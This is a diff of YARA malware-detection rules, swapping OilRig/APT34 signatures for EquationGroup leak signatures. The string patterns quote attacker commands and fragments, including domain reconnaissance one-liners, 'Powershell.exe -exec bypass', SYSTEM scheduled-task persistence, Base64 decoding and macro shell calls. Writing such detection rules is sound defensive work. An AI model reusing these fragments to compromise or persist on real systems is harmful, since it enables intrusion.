-		id = "a4fe24b8-290a-5a4a-9f81-bbbd9aae6c6e"
-		date = "2016-10-12"
+		id = "694a1afc-7fea-58ac-b736-44957bbc0334"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L151-L166"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3400-L3416"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "04c9f482c0c4abc1bf316459dc3085154defadb0fd5fe74ff274d8b3ee807b7f"
+		logic_hash = "1fa706fb7f138d679421fe6c5b29d6bf93893adc8bffe9dffaafa728c1b2d1d5"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "5893eae26df8e15c1e0fa763bf88a1ae79484cdb488ba2fc382700ff2cfab80c"
+		super_rule = 1
+		hash1 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash2 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$s1 = "whoami & hostname & ipconfig /all" ascii
-		$s2 = "net user /domain 2>&1 & net group /domain 2>&1" ascii
-		$s3 = "net group \"domain admins\" /domain 2>&1 & " ascii
+		$s4 = "Fragment: Packet too small to contain RPC header" fullword ascii
+		$s5 = "Fragment pickup: SmbNtReadX failed" fullword ascii
 
 	condition:
-		( filesize < 1KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_10 : FILE
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5967b39-5d21-5a6a-a1b5-2ec122f16444"
-		date = "2016-10-12"
+		id = "7dfff868-cb66-51c0-a7c7-5cc872232b86"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L168-L183"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3441-L3458"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "62a6f6c4e574a3c577f0b1fdd85eaa3e775a7ae0e457c59a6b6f741ad895e510"
+		logic_hash = "bc30c62da7a7fd9144efef6f44c50552234f372c38c4479a024fbb0ca72530de"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "02226181f27dbf59af5377e39cf583db15200100eea712fcb6f55c0a2245a378"
+		super_rule = 1
+		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
 
 	strings:
-		$x1 = "(Get-Content $env:Public\\Libraries\\dns.ps1) -replace ('#'+'##'),$botid | Set-Content $env:Public\\Libraries\\dns.ps1" fullword ascii
-		$x2 = "Invoke-Expression ($global:myhome+'tp\\'+$global:filename+'.bat > '+$global:myhome+'tp\\'+$global:filename+'.txt')" fullword ascii
-		$x3 = "('00000000'+(convertTo-Base36(Get-Random -Maximum 46655)))" fullword ascii
+		$x1 = "Probe #2 usage: %s -i TargetIp -p TargetPort -r %d [-o TimeOut] -t Protocol -n IMailUserName -a IMailPassword" fullword ascii
+		$x6 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER : 0x%08X" fullword ascii
+		$s19 = "Sending Implant Payload.. cEncImplantPayload size(%d)" fullword ascii
 
 	condition:
-		( filesize < 10KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_Oilrig_Malware_Nov17_13 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_ETBL_ETRE_EVFR_11 : FILE
 {
 	meta:
-		description = ""
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c45b8d30-6a5f-5dac-a202-6748ba7b7bd2"
-		date = "2017-11-22"
+		id = "d6848065-377b-5eda-821d-d2cc16f483cc"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ClearskySec/status/933280188733018113"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L185-L206"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3460-L3479"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eab15229f084681b27cec7ed959ef4cd1193a0b38aaed4341dcd6761e2505804"
+		logic_hash = "8d43aa4823de248308597bd02cd27e598808b94e1ad7348ddb9e27d8a37ac426"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f1e2df85c538875a7da877719555e21c33a558ac121eb715cf4e779d77ab445"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash4 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash5 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
 
 	strings:
-		$x1 = "\\Release\\dnscat2.pdb" ascii
-		$x2 = "cscript.exe //T:20 //Nologo " fullword ascii
-		$a1 = "taskkill /F /IM cscript.exe" fullword ascii
-		$a2 = "cmd.exe /c " fullword ascii
+		$x1 = "Target is vulnerable" fullword ascii
+		$x2 = "Target is NOT vulnerable" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "0160250adfc97f9d4a12dd067323ec61" or 1 of ( $x* ) or all of ( $a* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager_Macro : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_Ridearea2_12 : FILE
 {
 	meta:
-		description = "Detects OilRig malware"
-		author = "Eyal Sela (slightly modified by Florian Roth)"
-		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
-		date = "2018-01-19"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "63c7733c-9942-56f3-95cc-f3e72b693739"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L208-L233"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3481-L3498"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "35e540b87bb7425b601fad76f0ff33c60a4d91579fc50f5902d708d06fa755f6"
+		logic_hash = "0119cd825c02a094ddd76c5cb27bee6cef112f25333eab62017448804b29286e"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "e702223ab42c54fff96f198611d0b2e8a1ceba40586d466ba9aadfa2fd34386e"
 
 	strings:
-		$one1 = "$c$m$$d$.$$" ascii wide
-		$one2 = "$C$$e$r$$t$u$$t$i$$l$" ascii wide
-		$one3 = "$$%$a$$p$p$$d$a$" ascii wide
-		$one4 = ".$t$$x$t$$" ascii wide
-		$one5 = "cu = Replace(cu, \"$\", \"\")" ascii wide
-		$one6 = "Shell Environ$(\"COMSPEC\") & \" /c"
-		$one7 = "echo \" & Chr(32) & cmd & Chr(32) & \" > \" & Chr(34)" ascii wide
-		$two1 = "& SchTasks /Delete /F /TN " ascii wide
-		$two2 = "SecurityAssist" ascii wide
-		$two3 = "vbs = \"cmd.exe /c SchTasks" ascii wide
-		$two4 = "/Delete /F /TN Conhost & del" ascii wide
-		$two5 = "NullRefrencedException" ascii wide
-		$two6 = "error has occurred in user32.dll by" ascii wide
-		$two7 = "NullRefrencedException" ascii wide
+		$x2 = "** CreatePayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
 
 	condition:
-		filesize < 300KB and 1 of ( $one* ) or 2 of ( $two* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Oilrig_Intelsecuritymanager : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_13 : FILE
 {
 	meta:
-		description = "Detects OilRig malware"
-		author = "Eyal Sela"
-		id = "4cccc0df-a225-5500-be55-f4ae346e066e"
-		date = "2018-01-19"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "8bc3c47c-7357-5692-86aa-e43b40f8c1ab"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L235-L255"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3500-L3516"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "97debd5e74730e22133f29c89a0cf049862459c24d1b46634a973908040db3a7"
+		logic_hash = "0a1859266b859d4da660a7fc7d0015954ff100c39b941b5461ba0c99b5103547"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
 
 	strings:
-		$one1 = "srvResesponded" ascii wide fullword
-		$one2 = "InetlSecurityAssistManager" ascii wide fullword
-		$one3 = "srvCheckresponded" ascii wide fullword
-		$one4 = "IntelSecurityManager" ascii wide
-		$one5 = "msoffice365cdn.com" ascii wide
-		$one6 = "\\tmpCa.vbs" ascii wide
-		$one7 = "AAZFinish" ascii wide fullword
-		$one8 = "AAZUploaded" ascii wide fullword
-		$one9 = "ABZFinish" ascii wide fullword
-		$one10 = "\\tmpCa.vbs" ascii wide
+		$x1 = "Skip call to PackageRideArea().  Payload has already been packaged. Options -x and -q ignored." fullword ascii
+		$s2 = "ERROR: pGvars->pIntRideAreaImplantPayload is NULL" fullword ascii
 
 	condition:
-		filesize < 300KB and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Nameprobe_SMBTOUCH_14 : FILE
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6a082c5a-ee5b-5002-9148-61bbcfedfe68"
-		date = "2019-04-17"
+		id = "b3b7037b-d08e-5b32-93ec-870f8ce088ac"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L267-L283"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3518-L3535"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "afe203fdfcc9dcafb170bee972d45e66e5483a777112a00fa30516dfe81bbf88"
+		logic_hash = "c60fc34aa42810a5622fbe53122ded4ffb4ee321fed1badd481ce5c2ae5225ef"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "b1d621091740e62c84fc8c62bcdad07873c8b61b83faba36097ef150fd6ec768"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "fbe3a4501654438f502a93f51b298ff3abf4e4cad34ce4ec0fad5cb5c2071597"
+		hash2 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
 
 	strings:
-		$x1 = "= get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" ascii
-		$x2 = "Write-Host \"excepton occured!\"" ascii
-		$s1 = "Start-Sleep -s 1;" fullword ascii
-		$s2 = "Start-Sleep -m 100;" fullword ascii
+		$s1 = "DEC Pathworks TCPIP service on Windows NT" fullword ascii
+		$s2 = "<\\\\__MSBROWSE__> G" fullword ascii
+		$s3 = "<IRISNAMESERVER>" fullword ascii
 
 	condition:
-		1 of ( $x* ) or 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_2
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_RPC2_15 : FILE
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c3bdadfd-2164-5e33-be84-d5d5de8eb048"
-		date = "2019-04-17"
+		id = "f671a10d-f0b8-5343-97b5-e60b7f2f0acf"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L285-L304"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3537-L3555"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "57c8f02ebfb05f739fc4791a88be4a981ce7b89e2bd283669f85aae1a5c14d02"
+		logic_hash = "6c61d17e1a985deb31bd6e1d603283e77df477b52fce9eb8b6cb4e99b2f9c4dc"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "2943e69e6c34232dee3236ced38d41d378784a317eeaf6b90482014210fcd459"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$x1 = "= \"http://\" + [System.Net.Dns]::GetHostAddresses(\"" ascii
-		$x2 = "$t = get-wmiobject Win32_ComputerSystemProduct  | Select-Object -ExpandProperty UUID" fullword ascii
-		$x3 = "| Where { $_ -notmatch '^\\s+$' }" ascii
-		$s1 = "= new-object System.Net.WebProxy($u, $true);" fullword ascii
-		$s2 = " -eq \"dom\"){$" ascii
-		$s3 = " -eq \"srv\"){$" ascii
-		$s4 = "+\"<>\" | Set-Content" ascii
+		$x1 = "** SendAndReceive ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s8 = "Binding to RPC Interface %s over named pipe" fullword ascii
 
 	condition:
-		1 of ( $x* ) and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_APT34_PS_Malware_Apr19_3
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ELV_ESKE_EVFR_16 : FILE
 {
 	meta:
-		description = "Detects APT34 PowerShell malware"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "361582e7-94e3-5608-9ba9-31fa20c37cf0"
-		date = "2019-04-17"
-		modified = "2023-01-06"
-		reference = "https://twitter.com/0xffff0800/status/1118406371165126656"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L306-L326"
+		id = "2749227b-13e2-5669-a557-567ebd170a2f"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3557-L3578"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "77ba71a59d6026c4b393bc66af586066e11b0c496367a38d847396a23b3dffbe"
+		logic_hash = "3e6c4e013727bbbf3859374af46553067a9fc782f2eca582ea13d8eab03380ce"
 		score = 75
 		quality = 85
-		tags = ""
-		hash1 = "27e03b98ae0f6f2650f378e9292384f1350f95ee4f3ac009e0113a8d9e2e14ed"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "f7fad44560bc8cc04f03f1d30b6e1b4c5f049b9a8a45464f43359cbe4d1ce86f"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
 
 	strings:
-		$x1 = "Powershell.exe -exec bypass -file ${global:$address1}"
-		$x2 = "schtasks /create /F /ru SYSTEM /sc minute /mo 10 /tn"
-		$x3 = "\"\\UpdateTasks\\UpdateTaskHosts\""
-		$x4 = "wscript /b \\`\"${global:$address1" ascii
-		$x5 = "::FromBase64String([string]${global:$http_ag}))" ascii
-		$x6 = ".run command1, 0, false\" | Out-File " ascii
-		$x7 = "\\UpdateTask.vbs" ascii
-		$x8 = "hUpdater.ps1" fullword ascii
+		$x1 = "ERROR: TbMalloc() failed for encoded exploit payload" fullword ascii
+		$x2 = "** EncodeExploitPayload ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$x4 = "** RunExploit ** - EXCEPTION_EXECUTE_HANDLER" fullword ascii
+		$s6 = "Sending Implant Payload (%d-bytes)" fullword ascii
+		$s7 = "ERROR: Encoder failed on exploit payload" fullword ascii
+		$s11 = "ERROR: VulnerableOS() != RET_SUCCESS" fullword ascii
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Windivert_Driver : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ETBL_ETRE_SMBTOUCH_17 : FILE
 {
 	meta:
-		description = "Detects WinDivert User-Mode packet capturing driver"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95e89577-bb5a-5391-9130-155746d4783f"
-		date = "2017-10-02"
+		id = "88bf610d-1c6e-554a-af82-46b5eb3cc6a5"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.reqrypt.org/windivert.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_pua.yar#L1-L20"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3580-L3597"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db2933396e015e906114bd04f75a5b5caf0564494224f533a6e00c1fa5421568"
-		score = 40
+		logic_hash = "ef86350732b5064035ff58b63202be29e906d2b566af105f03298e3e339eda52"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "33c657fa27b92cfcced66b331cfea7a880460a98cf037e4277faa1420fe59d1c"
-		hash2 = "9b834e8f9d117bf2c564a37434973dc0717270ebfac8d8251711905d18da3858"
-		hash3 = "5ef707ea68a9bd3a3e568793a0f7d66d166694801ada067d9ebac1d13e53153e"
-		hash4 = "df12afa691e529f01c75b3dd734f6b45bf1488dbf90ced218657f0d205bff319"
+		super_rule = 1
+		hash1 = "70db3ac2c1a10de6ce6b3e7a7890c37bffde006ea6d441f5de6d8329add4d2ef"
+		hash2 = "e0f05f26293e3231e4e32916ad8a6ee944af842410c194fce8a0d8ad2f5c54b2"
+		hash3 = "7da350c964ea43c149a12ac3d2ce4675cedc079ddc10d1f7c464b16688305309"
 
 	strings:
-		$s1 = "WinDivertDllEntry" fullword ascii
-		$s2 = "WinDivertHelperParseIPv4Address" fullword ascii
-		$s3 = "WinDivert (web: http://reqrypt.org/windivert.html)" fullword wide
+		$x1 = "ERROR: Connection terminated by Target (TCP Ack/Fin)" fullword ascii
+		$s2 = "Target did not respond within specified amount of time" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_SUSP_VEST_Encryption_Core_Accumulator_Jan21 : FILE
+rule SIGNATURE_BASE_Equationgroup_Scanner_Output : FILE
 {
 	meta:
-		description = "Detects VEST encryption core accumulator in PE file as used by Lazarus malware"
+		description = "Detects output generated by EQGRP scanner.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8343652b-8865-5213-b735-d6d4084e4a84"
-		date = "2021-01-28"
+		id = "a73bc98f-f7b1-5f16-bf23-1d5c9a7a371b"
+		date = "2017-04-17"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/ochsenmeier/status/1354737155495649280"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jan21.yar#L2-L25"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3609-L3626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "41fe42b2f2b5fb54b7ff19b74a35aadd928be9a3c7280ee9feffc4a142924b07"
-		score = 70
+		logic_hash = "a8ac7e7f14d72798a1f6658eae4c66d871a525c8cb49afa2ca8656047da20524"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "7cd3ca8bdfb44e98a4b9d0c6ad77546e03d169bda9bdf3d1bcf339f68137af23"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sc1 = { 4F 70 46 DA E1 8D F6 41 59 E8 5D 26 1E CC 2F 89
-               26 6D 52 BA BC 11 6B A9 C6 47 E4 9C 1E B6 65 A2
-               B6 CD 90 47 1C DF F8 10 4B D2 7C C4 72 25 C6 97
-               25 5D C6 1D 4B 36 BC 38 36 33 F8 89 B4 4C 65 A7
-               96 CA 1B 63 C3 4B 6A 63 DC 85 4C 57 EE 2A 05 C7
-               0C E7 39 35 8A C1 BF 13 D9 52 51 3D 2E 41 F5 72
-               85 23 FE A1 AA 53 61 3B 25 5F 62 B4 36 EE 2A 51
-               AF 18 8E 9A C6 CF C4 07 4A 9B 25 9B 76 62 0E 3E
-               96 3A A7 64 23 6B B6 19 BC 2D 40 D7 36 3E E2 85
-               9A D1 22 9F BC 30 15 9F C2 5D F1 23 E6 3A 73 C0 }
+		$s0 = "# scanning ip  " ascii
+		$s1 = "# Scan for windows boxes" ascii fullword
+		$s2 = "Going into send" ascii fullword
+		$s3 = "# Does not work" ascii fullword
+		$s4 = "You are the weakest link, goodbye" ascii fullword
+		$s5 = "rpc   Scan for RPC  folks" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 1 of them
+		filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_Ivanti_EPMM_Mobileiron_Core_CVE_2023_35078_Jul23_1 : CVE_2023_35078
+rule SIGNATURE_BASE_APT_MAL_DNS_Hijacking_Campaign_AA19_024A : FILE
 {
 	meta:
-		description = "Detects the successful exploitation of Ivanti Endpoint Manager Mobile (EPMM) / MobileIron Core CVE-2023-35078"
-		author = "Florian Roth"
-		id = "44cca0b5-3851-5786-82fd-ce3ccb566453"
-		date = "2023-07-25"
+		description = "Detects malware used in DNS Hijackign campaign"
+		author = "Florian Roth (Nextron Systems)"
+		id = "6a476052-ba4e-5049-9c7a-f8949d26e7b5"
+		date = "2019-01-25"
 		modified = "2023-12-05"
-		reference = "Ivanti Endpoint Manager Mobile (EPMM) CVE-2023-35078 - Analysis Guidance"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_ivanti_epmm_mobileiron_cve_2023_35078.yar#L2-L14"
+		reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_aa19_024a.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ebc59032b7450aa438ca30170560c95550cda6ff7774b8ce1486309716da9e6c"
+		logic_hash = "8e9ec132df6cf6a89f6694682292feec0f3a762c2df6b1dc8180d9ab68e7183b"
 		score = 75
-		quality = 60
-		tags = "CVE-2023-35078"
+		quality = 85
+		tags = "FILE"
+		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$xr1 = /\/mifs\/aad\/api\/v2\/[^\n]{1,300} 200 [1-9][0-9]{0,60} /
+		$s2 = "/Client/Login?id=" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s4 = ".\\Configure.txt" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
 
 	condition:
-		$xr1
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_MAL_WAR_Ivanti_EPMM_Mobileiron_Mi_War_Aug23 : CVE_2023_35078 FILE
+
+rule SIGNATURE_BASE_Crime_Win32_Dridex_Socks5_Mod
 {
 	meta:
-		description = "Detects WAR file found in the Ivanti EPMM / MobileIron Core compromises exploiting CVE-2023-35078"
-		author = "Florian Roth"
-		id = "cd16cf29-a90d-5c3f-b66f-e9264dbf79fb"
-		date = "2023-08-01"
+		description = "Detects Dridex socks5 module"
+		author = "@VK_Intel"
+		id = "cee256b1-ad80-55dd-bbd3-0d3f7bc49664"
+		date = "2020-04-06"
 		modified = "2023-12-05"
-		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-213a"
